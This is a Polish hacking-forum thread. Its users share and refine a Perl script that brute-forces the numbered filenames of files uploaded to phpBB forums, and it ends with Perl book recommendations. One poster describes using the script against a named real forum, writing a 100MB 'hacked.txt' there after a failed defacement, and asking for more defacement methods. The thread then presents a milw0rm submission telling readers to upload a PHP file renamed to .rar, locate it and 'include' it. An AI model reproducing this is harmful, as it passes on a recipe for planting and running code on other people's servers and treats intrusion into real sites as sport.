sql inj

[gogulas]

Heh, pamietam ze z tym katalog wyzej probowalem, ale jakos inaczej i nie wychodzilo, teraz zadzialalo, thnx.
Jak zwykle robie coś prawie dobrze, czyli całkiem źle

napisalem sobie skrypcik do szukania tego pliku lol_xxx.rar, a wylasciwie wygenerowanie listy z potencjalnymi nazywami:

Kod:

#!/usr/bin/perl

for ($a = 100; $a < 999; ++$a)
{
  print "iexplore www.goleniow.zhp.pl/forum/files/hh_$a.rar\n";
}

odpalilem z parametrem, skrypt.pl>>pliki.bat
plik pliki.bat wrzucilem do c:\Prog files\IE, odpalilem i po kolei otwierala sie strona po stronie, do mnie nalezalo tylko klikac na krzyzyk i czekaz az trafi

Niestety nie dalo rady defacnac (pewnie wszystko na 750), ale utowrzyc "hacked.txt" (~100MB) juz tak moja pierwsza w zyciu ingerencja w czyjas strone :-) oczywiscie autora poinformowalem i juz sobie to załatał

thnx all

Zna ktos jeszcze jakies metody na deface? :P

[TQM]

Kod:

#!/usr/bin/perl
use strict;

for (my $cnt=0; $cnt <= 999; $cnt++) {
  printf("iexplore www.goleniow.zhp.pl/forum/files/hh_%03d.rar\n", $cnt);
}

[gogulas]

Hmmm, a napiszesz jeszcze dlaczego printf i %03d?

[GSG-9]

http://www.ssds.ucdavis.edu/unix/unix-7-17-9.html
a tamto to niewiem

[TQM]

printf() wyswietla na ekran a sprintf() zapisuje wynik do zmiennej...
%03d - 3 cyfry szerokosci, uzupelnione zerem z przodu jesli jest taka potrzeba

[gogulas]

Hehe, poszlo na milw0rm.com, dostalem maila zwrotnego z zapytaniem na jakich wersjach to dziala bo w pierwszym liscie tego nie napisalem,

Kod:

phpBB forum (all versions) uploadet file finder

# created by tqm & gogulas(at)wp(dot)pl _hack.pl_

# when you upload a file in phpBB forum the deflaut url for this file is:
# localhost/forum/files/yourfilename_xxx.yyy
# where xxx is random number and yyy is extension
# just rename your php file to rar execution 
# (or any other repsected by the forum) and upload
# here is a script to find this file:


#!/usr/bin/perl
use strict;

for (my $cnt=0; $cnt <= 999; $cnt++) {
  printf("iexplore www.forum.com/forum/files/nameoffile_%03d.yyy\n", $cnt);
}


# run with parametr script.pl>>files.bat
# move files.bat to c:\program files\internet explorer\
# run it and keep closing IE windows until you shoot the corret one
# then you can include it or anything else :)

hehe, jak to zamieszcza to oficjalnie przejde na poziom "regular lame lvl 2"
mocno nakaleczylem j. angielski?

[GSG-9]

powiem tyle - gz

uploaded a nie uploadet w 1 linii
na regular lame lvl3 wlam sie do nasa i zamow darmowa pizze

[TQM]

Ja bym tego nie wyslal no ale... niech bedzie...
Po pierwsze to nie exploit tylko generator listy plikow a po drugie ten skrypt nie robi nawer polowy roboty - mozna go napisac aby robil calosc - bez pomocy IE i to byloby kolejne kilka linijek raptem. Tak czy inaczej powodzenia.

Perl Powered of course

[gogulas]

Eh, skrobnij jak mozesz,
tylko nie wiadomo jak sie zachowa bo bat czekal az zamkne poprzednie okno przegladarki dopiero wtedy otwaral nastepne...

poleccie mi jakas fajna ksiazke o perlu, cos co upoluje w pdfie..

/edit
bez pomocy IE?
jesli katalog /files jest zablokowany (htaccess chyba) to nie bedzie pokazywal czy plik jest czy tez nie, nawet jesli trafisz, mozna sie jednak polapac po subtelnej roznicy w reakcji przegladarki...

/edit2
Ja tego nie nazywam exploitem

[TQM]

W Perlu nie ma problemu z pobieraniem stron WWW i to na wiecej niz jeden sposob - mozesz probowac pobrac plik - jeden za drugim i patrzec czy dostaniesz content czy 401/404. W Perlu mozna nawet sterowac zachowaniem przegladarki z poziomu skryptu - otworz taki URL, napisz to na klawiaturze, potwierdz ta opcje w pytaniu JavaScript, itd.

Ja w ten sposob zrobilem dla naszej ekipy pobieranie raportow z systemu jednego z partnerow - odpala IE (strona dziala TYLKO z IE), loguje usera, przelazi przez cale menu z prawie 200 roznych raportow, pobiera co trzeba i zapisuje w osobnych plikach uzywajac 'save link as'... Nasz ksiegowy odpala kompa, dwuklik na ikonce i idzie zrobic sobie kawe - zanim wroci, komplet raportow czeka w nowym folderze.

Co do ksiazek - nie polece nic w jezyku Polskim bo dawno nic nie mialem w reku... choc tlumaczenia tego co ponizej widzialem.

1. Programming Perl - 2nd edition (gdzies juz widzialem 3 wydanie - tzw. Camel Book - wielblad na okladce)
2. Perl Cookbook - 2nd edition (analizowac problemy i rozwiazania)
3. Learning Perl - 4th edition (tzw. Lama Book - lama na okladce)

Mam wszystkie na papierze po angielsku oraz gdzies u rodzicow po polsku choc nieco starsze wydania. Wydawnictwo O'Reilly oczywiscie.

btw - temat ksiazek omawialem dokladnie jakis czas temu.